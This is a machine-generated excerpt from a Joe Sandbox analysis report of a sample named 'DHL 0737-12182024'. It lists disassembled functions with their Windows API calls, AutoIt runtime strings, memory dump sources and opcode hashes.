                                                                                            • Instruction ID: 00805d4080e814d709776a1ffb31b378674873aae7a8f2bcf50f400a3e6aee29
                                                                                            • Opcode Fuzzy Hash: 2bce46c12a522bde595f1fa0005999fe387560c36fea9ae3261394ae87880302
                                                                                            • Instruction Fuzzy Hash: B451B070A00209EBDF20EFA8D884BAEBBF4FF85314F144219E451D72A1D7709D45CB61
                                                                                            Function 0088C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0088C913
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconLoad
                                                                                            • String ID: blank$info$question$stop$warning
                                                                                            • API String ID: 2457776203-404129466
                                                                                            • Opcode ID: 9c4caba27f6e18d7bf6217517af892468035d21de95da7cc4be2c02b62d4a4cf
                                                                                            • Instruction ID: 1efdcc37d6aca7b6c3fd97cea52776be5c436ded0eb9403f3f79af7d31c06249
                                                                                            • Opcode Fuzzy Hash: 9c4caba27f6e18d7bf6217517af892468035d21de95da7cc4be2c02b62d4a4cf
                                                                                            • Instruction Fuzzy Hash: 0A110D3168970BBAE701BB659C83DAA6B9CFF15368B20017BF500E6382F7745E405379
                                                                                            Function 0088ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$LocalTime
                                                                                            • String ID:
                                                                                            • API String ID: 952045576-0
                                                                                            • Opcode ID: 1085ce8f5f63c57eb63599e9a0cd34b7f6618b3425e5a1feb98097f35c750ee0
                                                                                            • Instruction ID: eeb313571f986f4b89af632027853d8e0eab49d6e3109b0a4d6d71af16e6d0d5
                                                                                            • Opcode Fuzzy Hash: 1085ce8f5f63c57eb63599e9a0cd34b7f6618b3425e5a1feb98097f35c750ee0
                                                                                            • Instruction Fuzzy Hash: 82414E65C1022C76CB11FBF8888AACFBBA8FF45710F508566E518E3121FB74E655C3A6
                                                                                            Function 0083F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 0083F953
                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 0087F3D1
                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 0087F454
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            • Opcode ID: e3887ba696f60cca2a3116e7c7afe295d8cd59e004824e4f8e1d1ab9a4032687
                                                                                            • Instruction ID: 0cbce81d641118e7a4dda32a9149629e52d17cad58cf38e5e5b9d4ed13f0bfed
                                                                                            • Opcode Fuzzy Hash: e3887ba696f60cca2a3116e7c7afe295d8cd59e004824e4f8e1d1ab9a4032687
                                                                                            • Instruction Fuzzy Hash: 5441B631A08640BAC7359B2DC88876A7F91FBD6324F14853CEA4BD6667C675E880CBD1
                                                                                            Function 008B2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 008B2D1B
                                                                                            • GetDC.USER32(00000000), ref: 008B2D23
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008B2D2E
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 008B2D3A
                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008B2D76
                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008B2D87
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008B5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 008B2DC2
                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008B2DE1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3864802216-0
                                                                                            • Opcode ID: bee11937f5ba09380e997c70bdfd59585e4f2c64e2da510cd3fd6b2057bababc
                                                                                            • Instruction ID: be6ae0ca4f2e3a7de4194d9358538fe52566bb12b5bd6f6fa20e89d02f0ecae4
                                                                                            • Opcode Fuzzy Hash: bee11937f5ba09380e997c70bdfd59585e4f2c64e2da510cd3fd6b2057bababc
                                                                                            • Instruction Fuzzy Hash: 50318972201214BBEB218F54CC8AFEB3BA9FF4A711F084155FE08DA291C6B59C51CBA4
                                                                                            Function 00885622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 2931989736-0
                                                                                            • Opcode ID: 4425f360d03fda970a96b0eac293d0c351f8e49cd00cca68aa068b306daeba35
                                                                                            • Instruction ID: 5ea651fa243032cb0ae5a189c071d4b179f37e20e03f3d459108cbdcb5dfe18c
                                                                                            • Opcode Fuzzy Hash: 4425f360d03fda970a96b0eac293d0c351f8e49cd00cca68aa068b306daeba35
                                                                                            • Instruction Fuzzy Hash: C7219571690A1D77D614B924CD92FFA235CFF30398B444020FE15DA782F729ED5187A6
                                                                                            Function 008A4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                            • API String ID: 0-572801152
                                                                                            • Opcode ID: 9c92163075c3e0de771026d82272214deca83384a4fdf0772d80eadd7cca05a0
                                                                                            • Instruction ID: c86ea6d0cb829377cc85fe50f434a0aac96a2ff265dd4df9757fce70efed1609
                                                                                            • Opcode Fuzzy Hash: 9c92163075c3e0de771026d82272214deca83384a4fdf0772d80eadd7cca05a0
                                                                                            • Instruction Fuzzy Hash: C8D1A171A0060AAFEF10CFA8C881BAEB7B5FF49344F148469E915EB681E771DD85CB50
                                                                                            Function 00861522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008617FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008615CE
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00861651
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008617FB,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008616E4
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008616FB
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00861777
                                                                                            • __freea.LIBCMT ref: 008617A2
                                                                                            • __freea.LIBCMT ref: 008617AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                            • String ID:
                                                                                            • API String ID: 2829977744-0
                                                                                            • Opcode ID: 7c5b495a1f56e346b217af44ebb26baa539c9502a9632100957a70a27d4a4c00
                                                                                            • Instruction ID: 03ca15f8ca943e454cce71cd650c5e4f29d92c4ec625c389ab634164de7c98c0
                                                                                            • Opcode Fuzzy Hash: 7c5b495a1f56e346b217af44ebb26baa539c9502a9632100957a70a27d4a4c00
                                                                                            • Instruction Fuzzy Hash: 3F91D471E0021A9ADF208E74CC89AEEBBB5FF49314F1E4659E902E7152DB35CD44CBA1
                                                                                            Function 008A4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit
                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                            • API String ID: 2610073882-625585964
                                                                                            • Opcode ID: 836d7879b011138dce538661c552758c788c3fb0218196201735b32bd718e4d2
                                                                                            • Instruction ID: a704e46b348eed5808d7035ce61e38ace37eb8947223f02b11e5ba71d9849007
                                                                                            • Opcode Fuzzy Hash: 836d7879b011138dce538661c552758c788c3fb0218196201735b32bd718e4d2
                                                                                            • Instruction Fuzzy Hash: CC91AF71A00219ABEF20CFA5C844FAEBBB8FF86714F108559F515EB281D7B09945CFA0
                                                                                            Function 00891187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0089125C
                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00891284
                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008912A8
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008912D8
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0089135F
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008913C4
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00891430
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                            • String ID:
                                                                                            • API String ID: 2550207440-0
                                                                                            • Opcode ID: b5c861164054d9fe44a3d7c6a25424f76bdc032c3eec08f993d2f505204e771a
                                                                                            • Instruction ID: 36608cc0cb89e31c96921e25022f741c527299c550a7c5bd3a02f06e9a48b499
                                                                                            • Opcode Fuzzy Hash: b5c861164054d9fe44a3d7c6a25424f76bdc032c3eec08f993d2f505204e771a
                                                                                            • Instruction Fuzzy Hash: FF91E475A0421AAFDF00EF98C889BBEB7B5FF44315F184429E900EB291D774A941CB95
                                                                                            Function 0083948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                            • String ID:
                                                                                            • API String ID: 3225163088-0
                                                                                            • Opcode ID: a1188e2551bb6682262e81a8b0f09c0ee74751b066fb9e934d8dc6c09c0d8a5a
                                                                                            • Instruction ID: 0c5b36295960ccf9bf6bb49202d7a8e6f84be85412f529ae4cd8433c9aa65f6e
                                                                                            • Opcode Fuzzy Hash: a1188e2551bb6682262e81a8b0f09c0ee74751b066fb9e934d8dc6c09c0d8a5a
                                                                                            • Instruction Fuzzy Hash: 04911571D00219EFCB11CFA9C884AEEBBB8FF89320F148559E555F7251D774A982CBA0
                                                                                            Function 008A3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 008A396B
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008A3A7A
                                                                                            • _wcslen.LIBCMT ref: 008A3A8A
                                                                                            • VariantClear.OLEAUT32(?), ref: 008A3C1F
                                                                                              • Part of subcall function 00890CDF: VariantInit.OLEAUT32(00000000), ref: 00890D1F
                                                                                              • Part of subcall function 00890CDF: VariantCopy.OLEAUT32(?,?), ref: 00890D28
                                                                                              • Part of subcall function 00890CDF: VariantClear.OLEAUT32(?), ref: 00890D34
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                            • API String ID: 4137639002-1221869570
                                                                                            • Opcode ID: 102cff6aaa65ec5158ecc53faf56e3869968775748eb3eab8409105cc9820b64
                                                                                            • Instruction ID: 51f24235abbbaf5516c9b082918c7b9fd6606cc8fe7d41bdb1ce7a7be1672d74
                                                                                            • Opcode Fuzzy Hash: 102cff6aaa65ec5158ecc53faf56e3869968775748eb3eab8409105cc9820b64
                                                                                            • Instruction Fuzzy Hash: 059124756083159FD704EF28C48096AB7E5FF8A314F14892DF889DB351DB31EA46CB92
                                                                                            Function 008A4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0088000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?,?,0088035E), ref: 0088002B
                                                                                              • Part of subcall function 0088000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880046
                                                                                              • Part of subcall function 0088000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880054
                                                                                              • Part of subcall function 0088000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?), ref: 00880064
                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 008A4C51
                                                                                            • _wcslen.LIBCMT ref: 008A4D59
                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 008A4DCF
                                                                                            • CoTaskMemFree.OLE32(?), ref: 008A4DDA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                            • String ID: NULL Pointer assignment
                                                                                            • API String ID: 614568839-2785691316
                                                                                            • Opcode ID: 51eba62ff0e10ada73f97e2c39d9511fa12e5fa4b36766cf48ac8ec612963507
                                                                                            • Instruction ID: 9c72d846e59dd2812650e5d88f29044bd65cab5172ed5d2a99e0609476abbad5
                                                                                            • Opcode Fuzzy Hash: 51eba62ff0e10ada73f97e2c39d9511fa12e5fa4b36766cf48ac8ec612963507
                                                                                            • Instruction Fuzzy Hash: 0F912671D0022DAFEF14DFA8D880AEEBBB8FF49314F104169E915E7251EB709A548F61
                                                                                            Function 008B20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetMenu.USER32(?), ref: 008B2183
                                                                                            • GetMenuItemCount.USER32(00000000), ref: 008B21B5
                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008B21DD
                                                                                            • _wcslen.LIBCMT ref: 008B2213
                                                                                            • GetMenuItemID.USER32(?,?), ref: 008B224D
                                                                                            • GetSubMenu.USER32(?,?), ref: 008B225B
                                                                                              • Part of subcall function 00883A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00883A57
                                                                                              • Part of subcall function 00883A3D: GetCurrentThreadId.KERNEL32 ref: 00883A5E
                                                                                              • Part of subcall function 00883A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008825B3), ref: 00883A65
                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008B22E3
                                                                                              • Part of subcall function 0088E97B: Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 4196846111-0
                                                                                            • Opcode ID: a45cf9cf2ce60a40fc293d378b975a21f6883134dcdac4f97101548186d0e784
                                                                                            • Instruction ID: 25058599fe848f8c97c548e6902013c6a919dfe090c62574e19af6fd0a5285b3
                                                                                            • Opcode Fuzzy Hash: a45cf9cf2ce60a40fc293d378b975a21f6883134dcdac4f97101548186d0e784
                                                                                            • Instruction Fuzzy Hash: 59716D75A00215AFCB10EF68C885AEEBBF5FF88310F148459E916EB351DB34EE418B91
                                                                                            Function 008B7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsWindow.USER32(00B381D8), ref: 008B7F37
                                                                                            • IsWindowEnabled.USER32(00B381D8), ref: 008B7F43
                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 008B801E
                                                                                            • SendMessageW.USER32(00B381D8,000000B0,?,?), ref: 008B8051
                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 008B8089
                                                                                            • GetWindowLongW.USER32(00B381D8,000000EC), ref: 008B80AB
                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008B80C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                            • String ID:
                                                                                            • API String ID: 4072528602-0
                                                                                            • Opcode ID: 07018c1d7c361b1cd2d10fc84943fb0929171775edf787f53a208428218f4c2c
                                                                                            • Instruction ID: e9e2597cc7cc9743371f0b46e2dd14044e87bfec815eb8d07cb840d8a7b33469
                                                                                            • Opcode Fuzzy Hash: 07018c1d7c361b1cd2d10fc84943fb0929171775edf787f53a208428218f4c2c
                                                                                            • Instruction Fuzzy Hash: 51718834A09604EFEB20AF64C884FFABBB9FF99340F140459E955D73A1CB31A845CB24
